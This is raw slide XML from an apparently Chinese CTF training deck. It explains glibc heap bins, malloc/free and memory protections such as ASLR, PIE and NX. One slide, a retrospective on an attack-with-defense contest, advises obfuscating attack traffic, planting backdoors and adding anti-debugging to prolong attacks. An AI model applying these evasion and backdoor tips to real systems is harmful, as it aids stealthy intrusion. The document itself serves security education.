          <p:cNvPr id="8" name="矩形 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4523F55C-3161-4D65-9A0D-F7DD3E8609D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217416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C8C7642-9C56-484D-95DD-7187DE921B60}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2378101" y="3001055"/>
            <a:ext cx="8208885"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fastbinsY[]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单向列表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LIFO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16、24、32、40、48、56、64 Bytes 的 free chunks（32位下默认）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其中的 chunk 的 in_use 位（下一个物理相邻的 chunk 的 P 位）总为1</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="矩形 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BE06066D-4903-4C94-9D92-567420132954}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2378101" y="1859419"/>
            <a:ext cx="1946367"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fast bins</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="矩形 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{73506D7E-9A28-4AB6-B7F0-4243F3167C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39500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3" name="Picture 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8AA3423E-D26A-4D61-B735-880C2E35617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215" y="1038686"/>
            <a:ext cx="8259191" cy="49848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36EBD71-D5CC-48A8-B4EA-50509E2A87D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6415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6BF837-3378-47AE-A942-F54658058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85" y="1388112"/>
            <a:ext cx="4379512" cy="4442076"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="图片 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C8B9D870-1FCD-4E78-BC1E-4319999B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229" y="1388112"/>
            <a:ext cx="4598487" cy="4442076"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="矩形 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BD18D9CB-62E2-4E71-A7D5-9DDF706A430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78039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B19B9D2-E81C-4A50-BEFA-22C553774865}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2643433" y="1539822"/>
            <a:ext cx="2838854"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unsorted bin</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="矩形 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4F3F1C11-1C60-41DD-A4C0-E6D71CCFBACB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3048000" y="3105835"/>
            <a:ext cx="6096000" cy="923330"/>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bins[1]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管理刚刚释放还为分类的 chunk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可以视为空闲 chunk 回归其所属 bin 之前的缓冲区</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="矩形 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{302F5155-CCDA-4138-8E71-BE51506294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860308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7170" name="Picture 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D3EDE1F8-41AC-4DC1-8858-1FFD79A35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016" y="1091953"/>
            <a:ext cx="2509051" cy="52822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69B62FF-E40C-40B3-8800-1FBB9C991D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6534434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8157E90F-0267-4022-B321-62FA4C046419}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1770962" y="1264613"/>
            <a:ext cx="2255746"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small bins</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="矩形 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D6FAAC94-2F4B-4101-8795-63C98FF9521E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2657383" y="2452430"/>
            <a:ext cx="6096000" cy="1754326"/>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bins[2] ~ bins[63]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62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 …… 、504 Bytes 的 free chunks（32位下）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每个链表中存储的 chunk 大小都一致</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="矩形 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4C51E43A-4C23-4FED-ADC5-804EF0409CB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1148008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5122" name="Picture 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{772839B9-CBD0-4DCC-B02A-F3EEEB3A75D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168" y="1225117"/>
            <a:ext cx="8347969" cy="46720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16DEC51-BC3A-4C5B-9916-F4D64FB0610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2329691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0E5B274E-E36B-4EBA-86E1-5EA5962B67EE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2857984" y="1898496"/>
            <a:ext cx="2213683"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large bins</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="矩形 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6D2B144C-D0C6-4E1B-92DA-5ADBF4C9050C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3048000" y="2993994"/>
            <a:ext cx="6096000" cy="1200329"/>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bins[64] ~ bins[126]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63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管理大于 504 Bytes 的 free chunks（32位下）</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="矩形 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C393F144-696B-4A1D-BFF1-485A10227B4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7185490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5362" name="Picture 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{60D632D3-CF1D-47B9-B3C1-57A9226577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414" y="1580225"/>
            <a:ext cx="6803254" cy="417694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A9E235-3D83-4540-A4BE-A6FDDAFF322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854576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BCD27FF-FF99-4018-9FD7-EB6A7EDBE3D2}"/>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它根据用户申请的内存块大小以及相应大小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通常使用的频度（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>fastbin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t> chunk, small chunk, large chunk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>），依次实现了不同的分配方法。</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它由小到大依次检查不同的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中是否有相应的空闲块可以满足用户请求的内存。</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当所有的空闲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都无法满足时，它会考虑 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>top chunk</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top chunk </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>也无法满足时，堆分配器才会进行内存块申请。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" i="0" dirty="0">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548822"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malloc</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497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001813"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free</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="3200"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1271867-D3AA-4615-93FE-9110E7A18FDD}"/>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它将用户暂且不用的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回收给堆管理器，适当的时候还会归还给操作系统。</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它依据</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大小来优先试图将</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链入</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>tcache</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>或者是</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>fast bin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>。不满足则链入</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在条件满足时</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函数遍历</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并将其中的物理相邻的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合并，将相应大小的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分类放入</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>small bin</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large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除了</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>tcache</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t> chunk</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fast bin chunk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>，其它</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时会与其物理相邻的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>free chunk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>合并</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"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6328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490C488-4A79-4D5B-8F05-235A9DD4A0FE}"/>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59351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6</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AWD</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="72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485559" y="2120130"/>
            <a:ext cx="548906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08469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
        <p:nvSpPr>
          <p:cNvPr id="2" name="Rectangle 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1400C16B-BA15-428D-A9E4-15DD36083A68}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1330002" y="1527193"/>
            <a:ext cx="95319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分析流量的时候才发现平台提供的流量只有进来的流量, 没有从服务器返回的流量, 所以看不到完整的交互, 所以根据流量生成exp的脚本几乎没怎么用到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打别人的时候没有加混淆, 打了3, 4轮就打不到了, 都被patch了, 而且还看到了别人用我们的流量打我们, 不得不说有些队复用效率太高了</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="1800" b="0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:effectLst/>
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>打别的队的时候一定要加混淆</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>如果是</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>awd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>题目的话出题的时候可以多留几个后门</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>要不然也不会像这次一样打个</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>3, 4</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>轮就打不了了</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>而且也可以加一些反调手段</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>争取可以多打几轮</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>较新颖的姿势一般不会出现在</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>awd</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN"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618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3C0663-927A-4C0F-A8BD-51B5E9BD1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 y="1062257"/>
            <a:ext cx="10193173" cy="5506218"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="矩形 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{53E88B0F-B4CC-4AE2-985B-A4A5F9D4034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018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7344ED5-3D2F-44DB-9DBF-AEA8068E8317}"/>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08615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Ex1 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="7200" b="1" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>内存保护措施</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230582" y="2287184"/>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ASLR</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PIE</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the NX bits</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Canary</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RELRO</a:t>
            </a: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35758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574373" y="1982410"/>
            <a:ext cx="945162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ASLR </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3200" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>(Address Space Layout Randomization)</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4" name="文本框 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3ED9C22A-5D8D-45A8-AFE4-EA789B4661AB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2530527" y="2274798"/>
            <a:ext cx="6930921" cy="3693319"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0" eaLnBrk="0" fontAlgn="base" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
            </a:pPr>
            <a:br>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0">
                <a:latin typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
              </a:rPr>
            </a:br>
            <a:endParaRPr lang="zh-CN"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系统的防护措施，程序装载时生效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0：没有随机化。即关闭 ASLR</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1：保留的随机化。共享库、栈、mmap() 以及 VDSO 将被随机化</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2：完全的随机化。在randomize_va_space = 1的基础上，通过 brk() 分配的内存空间也将被随机化</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>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p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="矩形 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A29CE5CC-8CD5-44F7-9E04-FC0F15795CF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ASLR</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="15744975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822232" y="2630775"/>
            <a:ext cx="8547533"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PIE </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3200" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>(Position-Independent Executable)</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17313B0F-0FE6-4A22-8675-66671999FA13}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4039382" y="3313565"/>
            <a:ext cx="4113235" cy="923330"/>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随机化</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="24292E"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>ELF</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="24292E"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>文件的映射地址</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开启 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="24292E"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>ASLR </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="24292E"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>之后，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="24292E"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>PIE </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="24292E"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>才会生效</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B9331CE3-3F4F-46C3-B115-FBBE4D0060E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PIE</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="10231386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376374" y="2272445"/>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5ECC1460-F870-4071-A98C-D5293B8E0327}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2269141" y="2857220"/>
            <a:ext cx="7280856"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程序与操作系统的防护措施，编译时决定是否生效，由操作系统实现</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通过在内存页的标识中增加“执行”位</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可以表示该内存页是否可以执行</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若程序代码的 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="24292E"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>EIP </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="24292E"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>执行至不可运行的内存页</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则 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="24292E"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>CPU </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="24292E"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>将直接拒绝执行“指令”造成程序崩溃</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8722240-77B5-466B-BAC5-2FFB6EFF22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7220142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1374">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1A5DA647-DD17-40C0-8F42-5F9F885360A7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="5505940" y="1397047"/>
            <a:ext cx="5193300" cy="4734867"/>
            <a:chOff x="3771275" y="1085100"/>
            <a:chExt cx="3894975" cy="3551150"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="3" name="Shape 1375">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6ED360C0-0076-43AE-B5FE-08DBFE6D67D5}"/>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For Kernel</a:t>
              </a:r>
              <a:endParaRPr sz="1867" kern="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="4" name="Shape 1376">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{04BA68F7-E71B-4C7B-B3CE-59EC58C2AA5C}"/>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Stack</a:t>
              </a:r>
              <a:endParaRPr sz="1867" kern="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
